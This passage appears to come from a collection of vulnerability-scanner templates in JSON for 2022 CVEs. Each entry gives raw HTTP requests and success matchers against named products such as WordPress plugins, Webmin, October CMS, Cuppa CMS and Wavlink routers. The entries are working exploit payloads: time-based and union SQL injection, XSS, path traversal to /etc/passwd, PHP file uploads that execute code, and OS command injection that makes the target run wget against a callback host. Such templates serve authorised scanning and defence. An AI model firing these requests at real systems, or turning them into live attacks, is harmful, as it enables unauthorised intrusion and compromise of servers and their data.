/extensions/file-manager/http_download.cgi?module=filemin HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nReferer: {{RootURL}}/filemin/?xnavigation=1\n\nlink=http://{{interactsh-url}}&username=&password=&path=/{{ranstr}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Failed to write to /{{ranstr}}/index.html"]}]}]},{"id":"CVE-2022-41473","info":{"name":"RPCMS 3.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search/?q=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","rpcms"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40083","info":{"name":"Labstack Echo 4.8.0 - Open Redirect","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}//interactsh.com%2f.."],"matchers-condition":"and","matchers":[{"type":"regex","part":"location","regex":["^\\s*//interactsh.com/\\.\\."]},{"type":"status","status":[301]}]}]},{"id":"CVE-2022-0826","info":{"name":"WordPress WP Video Gallery <=1.7.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=wp_video_gallery_ajax_add_single_youtube&url=http://example.com/?x%26v=1%2522 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%2523\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Registred videos :\")"],"condition":"and"}]}]},{"id":"CVE-2022-37153","info":{"name":"Artica Proxy 4.30.000000 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /fw.login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuserfont=&artica-language=&StandardDropDown=&HTMLTITLE=&username=admin&password=admin%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Password\" value=\"admin\"><script>alert(document.domain)</script>","Artica Web"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-36537","info":{"name":"ZK Framework - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /login.zul HTTP/1.1\nHost: {{Hostname}}\n","POST /zkau/upload?uuid=101010&dtid={{dtid}}&sid=0&maxsize=-1 HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryCs6yB0zvpfSBbYEp\nContent-Length: 154\n\n------WebKitFormBoundaryCs6yB0zvpfSBbYEp\nContent-Disposition: form-data; name=\"nextURI\"\n\n/WEB-INF/web.xml\n------WebKitFormBoundaryCs6yB0zvpfSBbYEp--\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["<display-name>.*</display-name>","<welcome-file-list>((.|\n)*)welcome-file-list>","xml version","web-app"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"dtid","group":1,"regex":["dt:'(.*?)',cu:"],"internal":true}]}]},{"id":"CVE-2022-1398","info":{"name":"External Media without Import <=1.1.2 - Authenticated Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/upload.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-post.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurls=http%3A%2F%2F{{interactsh-url}}&width=&height=&mime-type=&action=add_external_media_without_import\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_2","words":["external-media-without-import"]}]}]},{"id":"CVE-2022-31981","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=teams/view_team&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Control Teams\")"],"condition":"and"}]}]},{"id":"CVE-2022-4306","info":{"name":"WordPress Panda Pods Repeater Field <1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-content/plugins/panda-pods-repeater-field/fields/pandarepeaterfield.php?itemid=1&podid=1);%20alert(document.domain);/*x&iframe_id=panda-repeater-add-new&success=1 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\")","contains(body_2, \"panda-repeater-add-new\")"],"condition":"and"}]}]},{"id":"CVE-2022-1713","info":{"name":"Drawio <18.0.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /proxy?url=http%3a//0:8080/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Flowchart Maker & Online Diagram Software</title>"]},{"type":"word","part":"header","words":["application/octet-stream"]}]}]},{"id":"CVE-2022-45917","info":{"name":"ILIAS eLearning <7.16 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/shib_logout.php?action=logout&return=https://example.com","{{BaseURL}}/ilias/shib_logout.php?action=logout&return=https://example.com"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)example\\.com\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-35416","info":{"name":"H3C SSL VPN <=2022-07-10 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wnm/login/login.json HTTP/1.1\nHost: {{Hostname}}\nCookie: svpnlang=<script>alert('document.domain')</script>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert('document.domain')</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1883","info":{"name":"Terraboard <2.2.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /api/search/attribute?versionid=*&tf_version=%27+and+(select%20pg_sleep(10))+ISNULL-- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=5"]},{"type":"word","part":"body","words":["\"page\":","\"results\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40879","info":{"name":"kkFileView 4.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/onlinePreview?url=aHR0cHM6Ly93d3cuZ29vZ2xlLjxpbWcgc3JjPTEgb25lcnJvcj1hbGVydChkb2N1bWVudC5kb21haW4pPj1QUQ=="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=1 onerror=alert(document.domain)>=PQ</p>","\u8be5\u6587\u4ef6\u4e0d"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38637","info":{"name":"Hospital Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /hms/user-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>User  | Dashboard</title>","Book My Appointment"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-21705","info":{"name":"October CMS -  Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /backend/backend/auth/signin HTTP/1.1\nHost: {{Hostname}}\n","POST /backend/backend/auth/signin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_session_key={{session_key}}&_token={{token}}&postback=1&login={{username}}&password={{password}}\n","POST /backend/cms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-OCTOBER-REQUEST-HANDLER: onSave\nX-OCTOBER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_session_key={{session_key}}&_token={{token}}&settings%5Btitle%5D={{randstr}}&settings%5Burl%5D=%2F{{randstr}}&fileName={{randstr}}&settings%5Blayout%5D=&settings%5Bdescription%5D=&settings%5Bis_hidden%5D=0&settings%5Bmeta_title%5D=&settings%5Bmeta_description%5D=&markup=%3C%3Fphp%0D%0A%0D%0Afunction+onInit()+%7B%0D%0A++++phpinfo()%3B%0D%0A%7D%0D%0A%0D%0A%3F%3E%0D%0A%3D%3D%0D%0A&code=&templateType=page&templatePath=&theme=demo&templateMtime=&templateForceSave=0\n","POST /backend/cms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-OCTOBER-REQUEST-HANDLER: onCreateTemplate\nX-OCTOBER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_session_key={{session_key}}&_token={{token}}&search=&type=page\n","POST /backend/cms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-OCTOBER-REQUEST-HANDLER: onOpenTemplate\nX-OCTOBER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path={{randstr}}.htm\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["function onInit()","phpinfo()","Safe mode is currently enabled. Editing the PHP code of CMS templates is disabled. To disable safe mode, set the `cms.enableSafeMode` configuration value to `false`."],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"xpath","name":"session_key","internal":true,"xpath":["/html/body/div[1]/div/div[2]/div/div/form/input[1]"],"attribute":"value"},{"type":"xpath","name":"token","internal":true,"xpath":["/html/body/div[1]/div/div[2]/div/div/form/input[2]"],"attribute":"value"},{"type":"regex","name":"theme","group":1,"regex":["<input\\stype=\\\\\"hidden\\\\\"\\svalue=\\\\\"demo\\\\\"\\sname=\\\\\"([^\"]*)\\\\\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-34576","info":{"name":"WAVLINK WN535 G3 - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportAllSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","words":["Login=","Password=","Model=","AuthMode="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25216","info":{"name":"DVDFab 12 Player/PlayerFab - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/download/C%3a%2fwindows%2fsystem.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2488","info":{"name":"Wavlink WN535K2/WN535K3 - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://{{interactsh-url}}; HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-0784","info":{"name":"WordPress Title Experiments Free <9.0.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=wpex_titles&id[]=1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"{\\\"images\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2022-28079","info":{"name":"College Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/asign-single-student-subjects.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsubmit=Press&roll_no=3&course_code=sd' UNION ALL SELECT CONCAT(md5({{num}}),12,21),NULL,NULL,NULL,NULL#\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{{md5({{num}})}}"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2022-44946","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=page&is_active=1&position=listing&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=&description=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-24266","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","@timeout: 20s\nPOST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\norder_by=id`,if(SUBSTRING('test',1,1)='t',sleep(6),sleep(0))--+-&path=component%2Ftable_manager%2Fview%2Fcu_users&uniqueClass=wrapper_content_919044\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"list_admin_table\")"],"condition":"and"}]}]},{"id":"CVE-2022-29303","info":{"name":"SolarView Compact 6.00 - OS Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 25s\nPOST /conf_mail.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M\n"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0"]}]}]},{"id":"CVE-2022-31846","info":{"name":"WAVLINK WN535 G3 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/live_mfg.shtml"],"matchers-condition":"and","matchers":[{"type":"word","words":["Model=","DefaultIP=","LOGO1="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43140","info":{"name":"kkFileView 4.1.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/getCorsFile?urlPath={{base64('https://oast.me')}}"],"matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]}]}]},{"id":"CVE-2022-34049","info":{"name":"WAVLINK WN530HG4 - Improper Access Control","severity":"medium"},"requests":[{"raw":["GET /cgi-bin/ExportLogs.sh HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Login","Password"],"condition":"and"},{"type":"word","part":"header","words":["filename=\"sysLogs.txt\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32007","info":{"name":"Complete Online Job Search System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser_email={{username}}&user_pass={{password}}&btnLogin=\n","GET /admin/company/index.php?view=edit&id=-3%27%20union%20select%201,md5({{num}}),3,4,5,6--+ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-0346","info":{"name":"WordPress XML Sitemap Generator for Google <2.0.4 - Cross-Site Scripting/Remote Code Execution","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp","{{BaseURL}}/?p=1&xsg-provider=data://text/html,<?php%20echo%20md5(\"CVE-2022-0346\");%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp"],"stop-at-first-match":true,"req-condition":true,"matchers":[{"type":"word","part":"body_1","words":["<img src onerror=alert(document.domain)>","Invalid Provider type specified"],"condition":"and"},{"type":"word","part":"body_2","words":["2ef3baa95802a4b646f2fc29075efe34"]}]}]},{"id":"CVE-2022-25487","info":{"name":"Atom CMS v2.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /admin/uploads.php?id=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------30623082103363803402542706041\n\n-----------------------------30623082103363803402542706041\nContent-Disposition: form-data; name=\"file\"\n\n\n-----------------------------30623082103363803402542706041\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\nContent-Type: image/jpeg\n\n\n<?php echo md5('CVE-2022-25487');?>\n-----------------------------30623082103363803402542706041--\n","GET /uploads/{{filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["7ee3686858eb89dd68ccf85f0ea03abe"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"filename","group":1,"regex":["SET avatar = '(.*?)'"],"internal":true}]}]},{"id":"CVE-2022-1391","info":{"name":"WordPress Cab fare calculator < 1.0.4 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38296","info":{"name":"Cuppa CMS v1.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /js/jquery_file_upload/server/php/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary9MZjlIG8fVPjrlCI\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"path\"\n\n/\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"unique_name\"\n\ntrue\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"resize_width\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"resize_height\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"crop\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"compress\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"files[]\"; filename=\"test-{{randstr}}.jpg\"\nContent-Type: image/jpeg\n\n<?php\n\necho md5(\"CVE-2022-38296\");\n\n?>\n------WebKitFormBoundary9MZjlIG8fVPjrlCI--\n","POST /js/filemanager/api/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"from\":\"//{{filename}}\",\"to\":\"//{{randstr}}.php\",\"action\":\"rename\"}\n","GET /media/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["ed6bf8b1b4b8e64836455fe32b958c2c"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"filename","group":1,"regex":["\"name\":\"(.*?)\","],"internal":true}]}]},{"id":"CVE-2022-1906","info":{"name":"WordPress Copyright Proof <=4.16 - Cross-Site-Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action=dprv_log_event&message=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["got message <script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26233","info":{"name":"Barco Control Room Management Suite <=2.9 Build 0275 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2022-44952","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryMh2HSjWbM7zJjWOA\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"form_session_token\"\n\n{{nonce}}\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_NAME]\"\n\nTest\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_SHORT_NAME]\"\n\ntest\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"APP_LOGO\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_LOGO]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_LOGO_URL]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"APP_FAVICON\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_FAVICON]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_COPYRIGHT_NAME]\"\n\n<script>alert(document.domain)</script>\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_LANGUAGE]\"\n\nenglish.php\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_SKIN]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_TIMEZONE]\"\n\nAmerica/New_York\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_ROWS_PER_PAGE]\"\n\n10\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_DATE_FORMAT]\"\n\nm/d/Y\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_DATETIME_FORMAT]\"\n\nm/d/Y H:i\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_NUMBER_FORMAT]\"\n\n2/./*\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_FIRST_DAY_OF_WEEK]\"\n\n0\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[DROP_DOWN_MENU_ON_HOVER]\"\n\n0\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[DISABLE_CHECK_FOR_UPDATES]\"\n\n0\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA--\n","@timeout: 5s\nGET /index.php?module=dashboard/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_4 == 200","contains(content_type_4, \"text/html\")","contains(body_4, \"<script>alert(document.domain)</script>\")","contains(body_4, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-28023","info":{"name":"Purchase Order Management v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Master.php?f=delete_supplier HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nid=aman'+AND+(SELECT+2844+FROM+(SELECT(SLEEP(6)))FDTM)+AND+'sWZA'='sWZA\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, \"status\\\":\\\"success\")"],"condition":"and"}]}]},{"id":"CVE-2022-1221","info":{"name":"WordPress Gwyn's Imagemap Selector <=0.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script> popup-"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0201","info":{"name":"WordPress Permalink Manager <2.2.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(/XSS/)>","pm_query"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2022-36446","info":{"name":"Webmin <1.997 - Authenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /session_login.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}\n","POST /package-updates/update.cgi HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/package-updates/update.cgi?xnavigation=1\n\nmode=new&search=ssh&redir=&redirdesc=&u=0%3Becho+%27{{randstr}}%27%27{{randstr}}%27%3B+id%3B+echo+%27{{randstr}}%27%27{{randstr}}%27&confirm=Install%2BNow\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{randstr}}","uid","gid","groups"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38553","info":{"name":"Academy Learning Management System <5.9.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>","Study any topic"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23102","info":{"name":"SINEMA Remote Connect Server < V2.0 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1\nHost: {{Hostname}}\n","POST /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: csrftoken={{csrf}};\nReferer: 